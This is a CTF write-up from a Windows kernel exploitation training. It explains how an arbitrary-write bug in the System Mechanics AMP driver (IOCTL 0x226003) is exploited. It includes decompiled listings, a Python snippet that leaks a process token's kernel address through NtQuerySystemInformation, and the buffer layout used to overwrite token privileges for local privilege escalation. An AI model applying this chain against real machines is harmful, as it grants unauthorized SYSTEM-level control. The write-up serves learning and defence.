This post describes the blind exploitation of a known driver vulnerability in the context of @HackSysTeam’s Advanced Windows Kernel Exploitation training given at NorthSec 2019 in Montreal. Skip to the conclusion for a step-by-step summary of the exploit without spoiling the solution.

The full exploit code can be found on my GitHub

Introduction

Last week I attended NorthSec 2019 and was fortunate enough to take part in the Advanced Windows Kernel Exploitation training offered by HackSysTeam. The course was overall very pleasant and covered foundational kernel space concepts all the way up to advanced mitigation bypasses and exploitation. The material was extremely well presented and explained, making it easy to follow along.

The instructors also ran a mini CTF “competition” (which I may have taken a bit too seriously!) in parallel to the training to provide an environment in which to put the attendees’ newly acquired knowledge to the test. The track had increasingly difficult challenges that culminated in exploiting a real driver without any prior knowledge of its internals. While nobody solved it during the training, I could not let go and decided that I would finish it no matter what.

In this article I’ll try to give a detailed account of each step taken along the way to get a fully working exploit.

NOTE: For brevity I have only given decompiled and slightly cleaned up code listings in this post, but I have included the function addresses for those who want to look at the binary or assembly listings.

Recon

The CTF challenge description only mentions a System Mechanics driver to exploit, but does not give any additional information about how to interact with it, leaving it up to the participant to figure out the where, what, and how. Thankfully, drivers ampse.sys and amp.sys are provided, meaning that the driver to exploit is likely one of those.

The first step is thus to setup a VM and install the program, and take a look at the installed drivers using a tool called WinObj. After confirming that the drivers are indeed present, it’s important to identify which driver exposes functionality to userland. Here, it’s helpful to know that all kernel drivers are required to create a Device in order to expose any kind of functionality to the outside world, including other kernel drivers. This means it’s easy to spot the device using WinObj.

Permissions on the AMP device

Identifying the IOCTL Handler

Driver objects in Windows expose a limited number of I/O Request Packet (IRP) slots which act as a low-level callback interface for specific events that occur in the system. A few examples include IRP_MJ_CREATE and IRP_MJ_CLOSE. From a userland perspective, the interesting IRP code is IRP_MJ_DEVICE_CONTROL, which is a generic packet that contains an operation code named an I/O control code, or IOCTL for short. Without diving too much into internals, this allows the driver to expose custom functionality for users to call through the Windows IoDeviceControl API call in user mode, as long as they can acquire a handle to the driver device.

Since the IRP table must be populated before returning from the DriverEntry (the equivalent of main for kernel drivers), it’s relatively straightforward to locate the IOCTL handling routine and thus identify exposed IOCTLs by reversing the driver from its entry point.

One way to do that is to use Ghidra and locate calls to IoCreateDevice, which both reveals the device name as well as the general location where the IRP handler functions are bound.

// FUN_2cfe0
ulonglong CreateDevice(longlong DriverObject)
{
   // ...
   if (g_DeviceHandle != 0) {
   RtlInitUnicodeString(local_30,L"\\Device\\AMP");
   RtlInitUnicodeString(local_20,L"\\DosDevices\\AMP");
   local_48 = IoCreateSymbolicLink(local_20,local_30);
   if (-1 < local_48) {
       *(DriverObject + 0x70) = 0x2c8b0;
       *(DriverObject + 0x80) = 0x2c8b0;
       *(DriverObject + 0xe0) = 0x2c580; // <-- IOCTL handler address
       *(DriverObject + 0xe8) = 0x2ce80;
       g_call_table = ExAllocatePool(0,0x98);
       if (g_call_table == 0x0) {
           local_48 = 0xc000009a;
       } else {
          // This call table will come in handy later
          *g_call_table = 9;
          *(g_call_table + 2) = 0x2cba0;
          g_call_table[4] = 0x18;
          *(g_call_table + 6) = 0x2cb20;
          g_call_table[8] = 0x10;
          *(g_call_table + 10) = 0x2c960;
          g_call_table[0xc] = 0x28;
          *(g_call_table + 0xe) = 0x2c850;
          g_call_table[0x10] = 8;
          *(g_call_table + 0x12) = 0x2c7f0;
          g_call_table[0x14] = 8;
          *(g_call_table + 0x16) = 0x18d20;
          g_call_table[0x18] = 0x20;
          *(g_call_table + 0x1a) = 0x2c510;
          g_call_table[0x1c] = 0;
          *(g_call_table + 0x1e) = 0x2c360;
          g_call_table[0x20] = 0x20;
          *(g_call_table + 0x22) = 0x2c460;
          g_call_table[0x24] = 8;
          uVar2 = store_call_table();
          local_48 = uVar2;
          if (-1 < local_48) {
              local_48 = 0;
          }
       }
    }
    // ...
}

We know the IOCTL handler must be at 0x2c580 because the IRP handler table is located at offset +0x70 in the _DRIVER_OBJECT and IRP_MJ_DEVICE_CONTROL is defined as 14 according to MagNumDb.

1: kd> dt _DRIVER_OBJECT
nt!_DRIVER_OBJECT
   +0x000 Type             : Int2B
   +0x002 Size             : Int2B
   +0x008 DeviceObject     : Ptr64 _DEVICE_OBJECT
   ... snip ...
   +0x070 MajorFunction    : [28] Ptr64     long
       // [0]  at +0x70 + (8 * 0)
       // ...
       // [14] at +0x70 + (8 * 0n14) = 0xe0

Diving into the handler function it’s fairly simple, and has a single IOCTL check insead of the expected switch statement:

// FUN_2c580
ulonglong HandleIOCTL(undefined8 irp,longlong irpsp)
{
    // ...

    *(irpsp + 0x38) = 0;
    device_io_ctl = *(irpsp + 0xb8);

    // This seems to be the only handled IOCTL
    if (*(device_io_ctl + 0x18) == 0x226003) {
        inSize = *(device_io_ctl + 0x10);
        inData = *(device_io_ctl + 0x20);
        is32bit = IoIs32bitProcess();
        res = Handle226003(is32bit,inData,inSize);
        ret = res;
    }
    else {
        ret = 0xc0000010;
    }
    *(irpsp + 0x30) = ret;

    IofCompleteRequest(irpsp,0);
    return ret;
}

This bit of code gives us two useful bits of knowledge:

The IOCTL code: 0x226003
The address of the handler for this IOCTL

Finding the Vulnerability

During the training, one of the CTF flags was to write a fuzzer to discover a crash, however, during the initial reversing effort to identify the IOCTL to fuzz, a quick look at the IOCTL handler was enough to notice a vulnerability thanks to Ghidra’s (free) decompiler which is so powerful that it makes it almost trivial to find what we are looking for.

// FUN_166d0
undefined8 Handle226003(char is32bit,undefined8 *userBuf,uint size)
{
    // ...

    if (is32bit == 0) {
        if (size < 0x18) {
            return 0xc0000023;
        }
        dst = userBuf[2];
        opcode = *userBuf;
    }
    else { // This branch can be ignored (32-bit)
        // ...
    }

    if (pOpcodeTable == 0x0) {
        return 0xc0000001;
    }

    if (*pOpcodeTable <= opcode) {
      return 0xc000000d;
    }

    opcode = pOpcodeTable[opcode * 2 + 1];
    call_handler(&opcode,pCallTable);
    if (is32bit == 0) {
        // [!!!!] Function result written to user-controlled address!
        *dst = result;
        return 0;
    }
    // This part is never reached.
    *dst = result;
    return 0;
}

Indeed, the user-controlled pointer is being dereferenced and written to in kernel-land. This effectively means that the caller is able to write anywhere in valid memory, including passing a pointer to kernel memory and having it written to. Unforutnately, finding this vulnerability and exploiting it are two very different stories.

Crafting the Exploit

In this section I am omitting a lot of hours spent hunting deadends. There are two main objectives here:

Figure out where to write
Figure out what to write

Despite the obviousness of those objectives, and having the vulnerability right in my face, it somehow took a lot longer than I’m comfortable admitting to connect the dots.

The general idea is that each process running in Windows is associated with an access token which determines what the process is allowed to do. The token is a complex data structure with a critical part that decides which actions a given process is allowed to perform:

1: kd> dt -r nt!_TOKEN
nt!_TOKEN
   +0x000 TokenSource      : _TOKEN_SOURCE
      +0x000 SourceName       : [8] Char
      +0x008 SourceIdentifier : _LUID
         +0x000 LowPart          : Uint4B
         +0x004 HighPart         : Int4B
      ... snip ...
      +0x040 Privileges       : _SEP_TOKEN_PRIVILEGES
         +0x000 Present          : Uint8B // Privileges to consider
         +0x008 Enabled          : Uint8B // Privileges that are granted
         +0x010 EnabledByDefault : Uint8B // Privileges granted to child processes
      ... snip ...

This so called _SEP_TOKEN_PRIVILEGES structure which resides at offset 0x40 (on 64-bit Windows) of the structure is nothing more than a bitfield where 1 means that a privilege is granted, and 0 means it isn’t. In other words, if one is able to write 0xffffffffffffffff in all three fields of the structure, the current process will have all permissions granted, and any child process will inherit those permisisons.

Great, let’s do it!… Wait… where is this token in memory?

No Read? No Problem!

After spending a long time trying to find a read primitive in order to bypass kASLR, I finally had a bit of a revelation thinking back on the training material: It’s possible to use userland APIs to leak kernel addresses. One such call is NtQuerySystemInformation. Some of the system information classes are not very well documented, but after fiddling around for a while I managed to get what I wanted: A way to figure out exactly where the token is located. Explaining it in text would be too long-winded so instead, here is the python snippet to leak the current process’ token address in kernel land:

STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
SystemExtendedHandleInformation = 64
def get_token_address():
    hProc = HANDLE(kernel32.GetCurrentProcess())
    pid = kernel32.GetCurrentProcessId()
    h = HANDLE()
    res = OpenProcessToken(hProc, TOKEN_QUERY, byref(h))
    if res == 0:
        print('[-] Error getting token handle: ')
        sys.exit(-1)

    # Find the handles associated with the current process.
    q = STATUS_INFO_LENGTH_MISMATCH
    out = DWORD(0)
    sz = 0
    while q == STATUS_INFO_LENGTH_MISMATCH:
        sz += 0x1000
        handle_info = (c_ubyte * sz)()
        q = ntdll.NtQuerySystemInformation(
                SystemExtendedHandleInformation,
                byref(handle_info),
                sz,
                byref(out)
            )

    # Parse handle_info to retrieve handles for the current PID
    handles = find_handles(pid, handle_info)
    hToken = filter(lambda x: x[0] == pid and x[2] == h.value, handles)

    if len(hToken) != 1: return None
    else: return hToken[0][1]

Without getting into the nitty gritty, this call leaks the address of every kernel object associated to a handle and looks through the results in order to identify the access token handle that belongs to the current process. Once it is found, the code extracts the kernel-land address of the token.

Write Limitations Require Creativity

Okay, after all of this effort and trouble, we still have one major hurdle: The write that we have allows us to write anywhere, but does not allow us to control the value of the write. This part takes a bit of additional reversing to identify a code path in the driver that will return a value as close as possible to 0xffffffffffffffff.

First, it’s important to understand the structure of the buffer being passed into the IOCTL:

+00 4B opcode [0..9]
+04 4B padding
+08 8B pointer to arguments buffer
+10 8B pointer to result buffer

The opcode determines which handler is called in call_handler as shown above. The padding is unused and can be ignored. Next, the arguments field contains a pointer to a buffer which will be read by the driver to retrieve the handler’s arguments. Lastly, the result field contains a pointer to the memory location where the driver will write its result.

There are 10 handlers in total. The idea is to find one that returns a satisfying value into the result buffer. Digging into each opcode handler that gets assigned to g_call_table, two of them stand out: 0x5 and 0x8. I’ve decided to go with 0x8 because the decompiled output is shorter:

// FUN_2c460
ulonglong opcode_8(int *param_1)
{
    // ...

    retval = 0;
    if (param_1 == 0x0) {
        retval = 0xfffffffe; // if param_1 is NULL.
    } else {
        // ... some logic and processing ...
    }

    // ...
    return retval;
}

So all we need to do is send an arguments buffer that has a NULL value for the first parameter and the driver should write 0xfffffffe to the location of our choice. This can be triggered multiple times to enable almost all privileges in the current process’ token.

…

Victory!

Full Exploit Chain

To summarize the attack, the following steps are taken:

Open the token in read-only within userland to get a handle on it.
Get the current process ID
Use NtQuerySystemInformation to leak kernel addresses of all objects with a handle.
Find the information entry for the token handle in the current process and get the kernel address. This bypasses kASLR.
Build an IOCTL request for the vulnerable driver that will return 0xfffffffe and set the output buffer address to point to the token privileges.
Repeat the previous step with all token privilege fields.
Spawn a child process which will inherit the token permissions.

The nice thing about this exploit is that it does not require any code execution, and therefore the only mitigation that needs to be bypassed is kASLR, which is trivial at medium integrity-level (but a completely different beast at low IL.)

Successful Exploitation

Conclusion

Well, this was a long winded article. If you’ve stuck this far, hopefully the write-up was clear enough that it was possible to follow along. This exploit required a bit of creativity with the restricted ability to control what was being written. I must admit that I initially spent a lot of time trying to get a true arbitrary write-what-where primitive and an arbitrary read.

The current exploit is limited in that it relies on medium integrity level calls in order to elevate privileges. Despite that, it was a great introduction to real-life kernel exploiting and reversing.

segfault

by alxbl

Exploiting an Arbitrary Write to Escalate Privileges